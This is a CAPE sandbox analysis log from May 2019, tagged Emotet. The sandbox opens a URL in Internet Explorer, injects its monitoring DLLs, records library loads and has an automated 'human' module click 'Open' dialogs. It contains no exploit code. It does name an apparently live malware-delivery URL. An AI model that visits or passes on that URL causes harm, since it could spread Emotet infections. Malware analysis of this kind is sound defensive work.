CAPE

Detections: Emotet


Analysis

Category: URL
Package: ie
Started: 2019-05-14 14:42:09
Completed: 2019-05-14 14:46:56
Duration: 287 seconds

  • Error: The analysis hit the critical timeout, terminating.

Options:
route = internet
procdump = 1

Log:
2019-05-14 15:42:09,000 [root] INFO: Date set to: 05-14-19, time set to: 14:42:09, timeout set to: 200
2019-05-14 15:42:09,062 [root] DEBUG: Starting analyzer from: C:\tcjnwjnzzp
2019-05-14 15:42:09,062 [root] DEBUG: Storing results at: C:\gpkjls
2019-05-14 15:42:09,062 [root] DEBUG: Pipe server name: \\.\PIPE\OcFYdy
2019-05-14 15:42:09,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-05-14 15:42:09,062 [root] INFO: Automatically selected analysis package "ie"
2019-05-14 15:42:10,029 [root] DEBUG: Started auxiliary module Browser
2019-05-14 15:42:10,029 [root] DEBUG: Started auxiliary module Curtain
2019-05-14 15:42:10,045 [modules.auxiliary.digisig] DEBUG: Skipping authenticode validation, analysis is not a file.
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module DigiSig
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Disguise
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Human
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Screenshots
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Sysmon
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Usage
2019-05-14 15:42:10,045 [root] INFO: Analyzer: Package modules.packages.ie does not specify a DLL option
2019-05-14 15:42:10,045 [root] INFO: Analyzer: Package modules.packages.ie does not specify a DLL_64 option
2019-05-14 15:42:10,092 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Internet Explorer\iexplore.exe" with arguments ""http://test5.freebottlepc.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/"" with pid 548
2019-05-14 15:42:10,092 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:42:10,092 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:10,092 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:42:10,357 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:10,357 [root] DEBUG: Loader: Injecting process 548 (thread 1900) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:10,357 [root] DEBUG: Process image base: 0x01330000
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x013D6000 - 0x77380000
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: Allocated 0x218 bytes for new import table at 0x013E0000.
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:42:10,357 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:10,357 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 548
2019-05-14 15:42:12,368 [lib.api.process] INFO: Successfully resumed process with pid 548
2019-05-14 15:42:12,368 [root] INFO: Added new process to list with pid: 548
2019-05-14 15:42:12,431 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:12,431 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 548 at 0x747a0000, image base 0x1330000, stack from 0x1e2000-0x1f0000
2019-05-14 15:42:12,477 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Internet Explorer\iexplore.exe" "http:\test5.freebottlepc.com\tuzpq\FILE\cooujsc19a2cegnj6_tcmotog-266543746\".
2019-05-14 15:42:12,477 [root] INFO: Monitor successfully loaded in process with pid 548.
2019-05-14 15:42:12,493 [root] DEBUG: DLL unloaded from 0x76940000.
2019-05-14 15:42:12,525 [root] DEBUG: DLL loaded at 0x731E0000: C:\Windows\system32\IEFRAME (0xa80000 bytes).
2019-05-14 15:42:12,555 [root] DEBUG: DLL loaded at 0x74B60000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2019-05-14 15:42:12,555 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-05-14 15:42:12,602 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\profapi (0xb000 bytes).
2019-05-14 15:42:12,618 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-05-14 15:42:12,618 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-05-14 15:42:12,665 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\System32\nlaapi (0x10000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-05-14 15:42:12,697 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-05-14 15:42:12,697 [root] DEBUG: DLL loaded at 0x768C0000: C:\Windows\syswow64\comdlg32 (0x7b000 bytes).
2019-05-14 15:42:12,775 [root] DEBUG: DLL loaded at 0x745C0000: C:\Program Files (x86)\Internet Explorer\sqmapi (0x33000 bytes).
2019-05-14 15:42:12,775 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:12,775 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:12,775 [root] DEBUG: DLL unloaded from 0x745C0000.
2019-05-14 15:42:12,775 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-05-14 15:42:12,789 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-05-14 15:42:12,789 [root] DEBUG: DLL unloaded from 0x77560000.
2019-05-14 15:42:12,789 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-05-14 15:42:12,914 [root] DEBUG: DLL unloaded from 0x75530000.
2019-05-14 15:42:12,914 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-05-14 15:42:12,914 [root] DEBUG: DLL unloaded from 0x01330000.
2019-05-14 15:42:12,930 [root] INFO: Announced 32-bit process name: iexplore.exe pid: 1552
2019-05-14 15:42:12,930 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:42:12,930 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:12,930 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:42:12,930 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:12,930 [root] DEBUG: Loader: Injecting process 1552 (thread 164) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:12,930 [root] DEBUG: Process image base: 0x01330000
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x013D6000 - 0x77380000
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: Allocated 0x218 bytes for new import table at 0x013E0000.
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:42:12,946 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:12,946 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1552
2019-05-14 15:42:12,946 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-05-14 15:42:12,946 [root] DEBUG: DLL loaded at 0x74580000: C:\Windows\system32\rasman (0x15000 bytes).
2019-05-14 15:42:12,946 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-05-14 15:42:12,946 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:12,946 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:12,946 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,946 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:42:12,946 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1552 at 0x747a0000, image base 0x1330000, stack from 0x2c2000-0x2d0000
2019-05-14 15:42:12,946 [root] DEBUG: Commandline: C:\Users\user\Desktop\"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:548 CREDAT:79873.
2019-05-14 15:42:12,946 [root] INFO: Added new process to list with pid: 1552
2019-05-14 15:42:12,946 [root] INFO: Monitor successfully loaded in process with pid 1552.
2019-05-14 15:42:12,961 [root] DEBUG: DLL unloaded from 0x76940000.
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x731E0000: C:\Windows\system32\IEFRAME (0xa80000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x74B60000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x768C0000: C:\Windows\syswow64\comdlg32 (0x7b000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL unloaded from 0x74AF0000.
2019-05-14 15:42:12,961 [root] DEBUG: DLL unloaded from 0x74580000.
2019-05-14 15:42:12,977 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:12,977 [root] DEBUG: DLL loaded at 0x74530000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-05-14 15:42:12,977 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-05-14 15:42:12,977 [root] DEBUG: DLL loaded at 0x74540000: C:\Program Files (x86)\Internet Explorer\IEShims (0x35000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74EF0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74520000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74510000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74490000: C:\Program Files (x86)\Internet Explorer\sqmapi (0x33000 bytes).
2019-05-14 15:42:13,009 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:13,009 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:13,009 [root] DEBUG: DLL unloaded from 0x74490000.
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x74450000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL unloaded from 0x74B30000.
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL unloaded from 0x74450000.
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-05-14 15:42:13,039 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-05-14 15:42:13,039 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1708
2019-05-14 15:42:13,039 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:42:13,039 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-14 15:42:13,039 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:13,039 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:42:13,039 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:13,039 [root] DEBUG: Loader: Injecting process 1708 (thread 0) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:13,039 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1776, handle 0x84
2019-05-14 15:42:13,039 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-05-14 15:42:13,039 [root] DEBUG: Process image base: 0x00000000FFA80000
2019-05-14 15:42:13,039 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-05-14 15:42:13,039 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-05-14 15:42:13,039 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-05-14 15:42:13,055 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:13,055 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:13,055 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:13,071 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\profapi (0xb000 bytes).
2019-05-14 15:42:13,086 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:42:13,086 [root] WARNING: Unable to hook LockResource
2019-05-14 15:42:13,118 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1708 at 0x0000000074260000, image base 0x00000000FFA80000, stack from 0x0000000006462000-0x0000000006470000
2019-05-14 15:42:13,118 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-05-14 15:42:13,118 [root] INFO: Added new process to list with pid: 1708
2019-05-14 15:42:13,118 [root] INFO: Monitor successfully loaded in process with pid 1708.
2019-05-14 15:42:13,134 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-14 15:42:13,134 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-14 15:42:13,134 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:13,196 [root] DEBUG: DLL loaded at 0x74230000: C:\Windows\system32\IEUI (0x2d000 bytes).
2019-05-14 15:42:13,196 [root] DEBUG: DLL loaded at 0x74220000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-05-14 15:42:13,257 [root] DEBUG: DLL loaded at 0x741F0000: C:\Program Files (x86)\Internet Explorer\ieproxy (0x2b000 bytes).
2019-05-14 15:42:13,305 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-05-14 15:42:13,321 [root] DEBUG: DLL unloaded from 0x74340000.
2019-05-14 15:42:13,368 [root] DEBUG: DLL loaded at 0x741E0000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-05-14 15:42:13,446 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:42:13,632 [root] DEBUG: DLL loaded at 0x74130000: C:\Windows\system32\xmllite (0x2f000 bytes).
2019-05-14 15:42:13,742 [root] DEBUG: DLL loaded at 0x73FC0000: C:\Windows\system32\explorerframe (0x16f000 bytes).
2019-05-14 15:42:13,773 [root] DEBUG: DLL loaded at 0x73F90000: C:\Windows\system32\DUser (0x2f000 bytes).
2019-05-14 15:42:13,789 [root] DEBUG: DLL loaded at 0x73ED0000: C:\Windows\system32\DUI70 (0xb2000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-05-14 15:42:13,914 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-05-14 15:42:13,914 [root] DEBUG: DLL loaded at 0x741F0000: C:\Program Files (x86)\Internet Explorer\ieproxy (0x2b000 bytes).
2019-05-14 15:42:13,928 [root] DEBUG: DLL loaded at 0x73E30000: C:\Windows\system32\msfeeds (0x96000 bytes).
2019-05-14 15:42:13,960 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-05-14 15:42:13,976 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-05-14 15:42:13,976 [root] DEBUG: DLL unloaded from 0x75530000.
2019-05-14 15:42:13,992 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\MLANG (0x2e000 bytes).
2019-05-14 15:42:13,992 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74580000: C:\Windows\system32\rasman (0x15000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74530000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x74580000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\system32\mswsock (0x3c000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74EF0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74520000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\MLANG (0x2e000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74510000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74450000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL unloaded from 0x74B30000.
2019-05-14 15:42:14,038 [root] DEBUG: DLL unloaded from 0x74450000.
2019-05-14 15:42:14,053 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-05-14 15:42:14,069 [root] DEBUG: DLL loaded at 0x73DE0000: C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim (0x11000 bytes).
2019-05-14 15:42:14,069 [root] DEBUG: DLL loaded at 0x73D40000: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80 (0x9b000 bytes).
2019-05-14 15:42:14,085 [root] DEBUG: DLL loaded at 0x73150000: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80 (0x87000 bytes).
2019-05-14 15:42:14,115 [root] DEBUG: DLL loaded at 0x73D30000: C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper (0x10000 bytes).
2019-05-14 15:42:14,427 [root] DEBUG: DLL loaded at 0x73010000: C:\PROGRA~2\MICROS~1\Office14\URLREDIR (0x91000 bytes).
2019-05-14 15:42:14,444 [root] DEBUG: DLL loaded at 0x73140000: C:\Windows\system32\Secur32 (0x8000 bytes).
2019-05-14 15:42:14,444 [root] DEBUG: DLL loaded at 0x74E40000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90 (0xa3000 bytes).
2019-05-14 15:42:14,460 [root] DEBUG: DLL loaded at 0x73120000: C:\PROGRA~2\MICROS~1\Office14\MSOHEV (0x14000 bytes).
2019-05-14 15:42:14,506 [root] DEBUG: DLL loaded at 0x73110000: C:\Program Files (x86)\Java\jre7\bin\jp2ssv (0xf000 bytes).
2019-05-14 15:42:14,538 [root] DEBUG: DLL loaded at 0x72F50000: C:\Program Files (x86)\Java\jre7\bin\MSVCR100 (0xbe000 bytes).
2019-05-14 15:42:14,552 [root] DEBUG: set_caller_info: Adding region at 0x043D0000 to caller regions list (ntdll::LdrLoadDll).
2019-05-14 15:42:14,569 [root] DEBUG: set_caller_info: Adding region at 0x00960000 to caller regions list (advapi32::RegOpenKeyExA).
2019-05-14 15:42:14,569 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-05-14 15:42:14,756 [root] DEBUG: DLL loaded at 0x72F30000: C:\Windows\system32\DWMAPI (0x13000 bytes).
2019-05-14 15:42:14,772 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-05-14 15:42:14,786 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:14,834 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:15,318 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:15,489 [root] WARNING: File at path "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\favicon[1].ico" does not exist, skip.
2019-05-14 15:42:16,346 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:16,611 [root] DEBUG: DLL unloaded from 0x75530000.
2019-05-14 15:42:16,674 [root] DEBUG: DLL loaded at 0x72EE0000: C:\Windows\System32\Wpc (0x4f000 bytes).
2019-05-14 15:42:16,690 [root] DEBUG: DLL loaded at 0x72EC0000: C:\Windows\System32\USERENV (0x17000 bytes).
2019-05-14 15:42:16,690 [root] DEBUG: DLL loaded at 0x72E70000: C:\Windows\System32\wevtapi (0x42000 bytes).
2019-05-14 15:42:16,706 [root] DEBUG: DLL loaded at 0x72E60000: C:\Windows\system32\samcli (0xf000 bytes).
2019-05-14 15:42:16,721 [root] DEBUG: DLL loaded at 0x72E40000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2019-05-14 15:42:16,736 [root] DEBUG: DLL loaded at 0x72E30000: C:\Windows\system32\netutils (0x9000 bytes).
2019-05-14 15:42:16,783 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:17,641 [modules.auxiliary.human] INFO: Found button "&Open", clicking it
2019-05-14 15:42:18,750 [root] DEBUG: DLL unloaded from 0x74130000.
2019-05-14 15:42:18,750 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:18,780 [root] DEBUG: DLL loaded at 0x72EC0000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-05-14 15:42:18,828 [root] DEBUG: DLL loaded at 0x74150000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x74230000.
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x74600000.
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x73FC0000.
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:18,890 [root] DEBUG: DLL unloaded from 0x73010000.
2019-05-14 15:42:18,905 [root] DEBUG: DLL unloaded from 0x73110000.
2019-05-14 15:42:18,905 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:18,937 [root] DEBUG: DLL unloaded from 0x73DE0000.
2019-05-14 15:42:19,015 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:19,015 [root] DEBUG: DLL loaded at 0x74140000: C:\Windows\system32\winshfhc (0x6000 bytes).
2019-05-14 15:42:19,046 [root] DEBUG: DLL loaded at 0x74100000: C:\Windows\system32\WDSCORE (0x32000 bytes).
2019-05-14 15:42:19,108 [root] DEBUG: DLL unloaded from 0x751C0000.
2019-05-14 15:42:19,747 [modules.auxiliary.human] INFO: Found button "&Open", clicking it
